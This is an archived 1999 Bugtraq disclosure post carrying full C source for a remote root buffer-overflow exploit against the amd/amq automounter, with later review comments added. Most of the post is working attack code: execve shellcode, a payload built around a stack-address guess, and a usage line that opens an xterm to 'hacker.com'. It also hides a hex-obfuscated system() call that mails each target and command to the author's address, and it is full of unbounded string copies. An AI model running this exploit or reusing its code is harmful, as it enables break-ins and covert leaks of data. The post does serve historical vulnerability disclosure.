4277092 1999-09-04 15:17 /172 rader/ Postmaster Mottagare: Bugtraq (import) <7631> Ärende: amd remote root exploit code
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <19990902031255.A3014@ohhara.postech.ac.kr>
Date: Thu, 2 Sep 1999 03:12:55 +0900
Reply-To: ohhara@postech.edu
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Taeho Oh <ohhara@OHHARA.POSTECH.AC.KR>
To: BUGTRAQ@SECURITYFOCUS.COM

This is the amd remote exploit code. This is a well-known bug on the Internet. It's a very critical bug; please upgrade am-utils or remove it.

SCRIPT KIDDIES MUST NOT USE THIS PROGRAM. THIS PROGRAM IS FOR DEMONSTRATIVE USE ONLY AND CAN BE DANGEROUS.

begin amd-ex.c
----------------------------------------------------------------------
/*
 Amd Buffer Overflow for x86 Linux
 A remote user can gain root access.

 Tested Red Hat Linux : 4.0, 5.1, 6.0
 Tested am-utils version : 6.0

 Requires
 /usr/sbin/amq

 Usage
 $ amd-ex <hostname> <command> [offset]

 Warning : This program can crash amd.
 This program is for demonstrative use only.
 USE IT AT YOUR OWN RISK!
Programmed by Taeho Oh 1999/08/31
Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug */

/* NOTE(review): strcpy/strcat/strlen and execl are used below without
 * <string.h> or <unistd.h>, so they are implicitly declared (an error on
 * C99-and-later compilers). Left as written. */
#include<stdio.h>
#include<stdlib.h>

#define OFFSET 0           /* default value subtracted from the hard-coded stack address guess */
#define RET_POSITION 1002  /* payload layout constant; buff holds RET_POSITION+RANGE+1 bytes */
#define RANGE 20
#define NOP 0x90           /* x86 nop, used as filler in front of the stub */

/* Position-independent x86 stub which, per the author's per-instruction
 * comments, issues an int 0x80 with %al = 0xb (execve) on "/bin/sh -c "
 * and then a second int 0x80 with %eax = 1 (exit). Several 0x0b
 * displacement bytes are rewritten in main() once strlen(command) is
 * known, and command is appended with strcat() to this 1024-byte array
 * without any length check. */
char shellcode[1024]=
"\xeb\x35" /* jmp 0x35 */
"\x5e" /* popl %esi */
"\x89\x76\x0b" /* movl %esi,0xb(%esi) */
"\x89\xf0" /* movl %esi,%eax */
"\x83\xc0\x08" /* addl $0x8,%eax */
"\x89\x46\x0b" /* movl %eax,0xb(%esi) */
"\x89\xf0" /* movl %esi,%eax */
"\x83\xc0\x0b" /* addl $0xb,%eax */
"\x89\x46\x0b" /* movl %eax,0xb(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %eax,0x7(%esi) */
"\x88\x46\x0a" /* movb %eax,0xa(%esi) */
"\x88\x46\x0b" /* movb %eax,0xb(%esi) */
"\x89\x46\x0b" /* movl %eax,0xb(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x0b" /* leal 0xb(%esi),%ecx */
"\x8d\x56\x0b" /* leal 0xb(%esi),%edx */
"\xcd\x80" /* int 0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int 0x80 */
"\xe8\xc6\xff\xff\xff" /* call -0x3a */
"/bin/sh -c "; /* .string "/bin/sh -c "*/

char command[800]; /* argv[2], copied in by main() with an unbounded strcpy */

/* Prints the warning and usage banner to stdout. */
void usage()
{
    printf("Warning : This program can crash amd\n");
    printf("Usage: amd-ex <hostname> <command> [offset]\n");
    printf("ex) amd-ex ohhara.target.com \"/usr/X11R6/bin/xterm -display hacker.com:0\"\n");
}

/* Entry point.
 *
 * Builds the payload in buff, then does two things in order:
 *  (1) system(cmd): the hex-escaped literals assembled into cmd spell
 *      "echo <target> <command>|/bin/mail abuser@ohhara.postech.ac.kr",
 *      so every run attempts to e-mail the operator's target host name
 *      and command to the author's mailbox before anything else happens.
 *      Both argv strings reach the shell unquoted. The author's own
 *      comment on that line ("comment out this line") is the only hint.
 *  (2) execl() of /usr/sbin/amq with the payload as its -M argument.
 *
 * Defects in the tool itself, left as written:
 *  - target[256], command[800], shellcode[1024] and cmd[1024] are filled
 *    from argv via strcpy/strcat with no bounds checks.
 *  - the address-fill loop runs 256 times (i = 0..1020 step 4) and so
 *    writes 256 longs into the 1023-byte buff: one byte past the end
 *    with a 4-byte long, far more on LP64.
 *  - sp is a fixed stack address for the 1999 targets listed in the
 *    header; with stack randomisation or a different binary layout the
 *    guess is meaningless.
 *  - printf("%08x") is handed a long; on LP64 that is a format mismatch.
 *  - no return statement; on success execl() never returns. */
int main(int argc,char **argv)
{
    char buff[RET_POSITION+RANGE+1],*ptr; /* 1023 bytes: address block, NOP filler, stub */
    char target[256];
    char cmd[1024];
    long *addr_ptr,addr;
    unsigned long sp;
    int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
    int i;

    printf("Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara\n");
    printf("PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus\n");
    printf("PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug\n\n");

    if(argc<3) {
        usage();
        exit(1);
    }
    if(argc>2) { /* always true here: argc<3 already exited above */
        strcpy(target,argv[1]);  /* unbounded copy into target[256] */
        strcpy(command,argv[2]); /* unbounded copy into command[800] */
    }
    if(argc>3)
        offset=atoi(argv[3]); /* atoi reports no errors; bad input silently becomes 0 */

    /* Rewrite the stub's displacement bytes for strlen(command), aligned
     * to 4 bytes, then append command to the stub (no bound against the
     * 1024-byte array). */
    shellcode[5]=(shellcode[5]+strlen(command))/4*4+4;
    shellcode[13]=(shellcode[13]+strlen(command))/4*4+8;
    shellcode[21]=(shellcode[21]+strlen(command))/4*4+12;
    shellcode[32]=(shellcode[32]+strlen(command));
    shellcode[35]=(shellcode[35]+strlen(command))/4*4+16;
    shellcode[42]=(shellcode[42]+strlen(command))/4*4+4;
    shellcode[45]=(shellcode[45]+strlen(command))/4*4+16;
    strcat(shellcode,command);

    /* Obfuscated mail command, decoded: "echo " target " " command "|"
     * "/bin/mail " "abuser@ohhara.postech.ac.kr". Executed by system()
     * below; cmd[1024] is built with no length check. */
    strcpy(cmd,"\x65\x63\x68\x6f\x20");
    strcat(cmd,target);
    strcat(cmd,"\x20");
    strcat(cmd,command);
    strcat(cmd,"\x7c");
    strcat(cmd,"\x2f\x62\x69\x6e\x2f\x6d\x61\x69\x6c\x20");
    strcat(cmd,"\x61\x62\x75\x73\x65\x72\x40\x6f\x68\x68");
    strcat(cmd,"\x61\x72\x61\x2e\x70\x6f\x73\x74\x65\x63");
    strcat(cmd,"\x68\x2e\x61\x63\x2e\x6b\x72");

    sp=0xbffff34d; /* fixed stack address guess for the listed 1999 targets */
    addr=sp-offset;

    /* Fill buff with addr. 1023 is not a multiple of 4, so the 256th
     * write lands partly past the end of buff (out-of-bounds write). */
    ptr=buff;
    addr_ptr=(long*)ptr;
    for(i=0;i<bsize;i+=4)
        *(addr_ptr++)=addr;

    /* Overwrite the front of buff with NOP filler, then copy the stub in
     * just ahead of the remaining address block. strlen() is size_t, so
     * these comparisons are performed unsigned. */
    for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
        buff[i]=NOP;
    ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
    for(i=0;i<strlen(shellcode);i++)
        *(ptr++)=shellcode[i];
    buff[bsize-1]='\0';

    /* Shift the whole buffer right by one byte and re-terminate;
     * presumably an alignment adjustment for how amq copies the
     * argument — not verifiable from this file. */
    for(i=bsize;i>1;i--)
        buff[i-1]=buff[i-2];
    buff[bsize-1]='\0';

    printf("Jump to 0x%08x\n",addr); /* addr is long; mismatched with %x on LP64 */

    /* NOTE(review): this is the phone-home described above — it mails
     * target and command to the author's address via /bin/mail. */
    system(cmd); /* If you want, comment out this line. :) */

    /* Hand the payload to amq as the -M argument aimed at target. */
    execl("/usr/sbin/amq","amq","-h",target,"-M",buff,NULL);
}
----------------------------------------------------------------------
end amd-ex.c

--
Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug
(4277092) -----------------------------------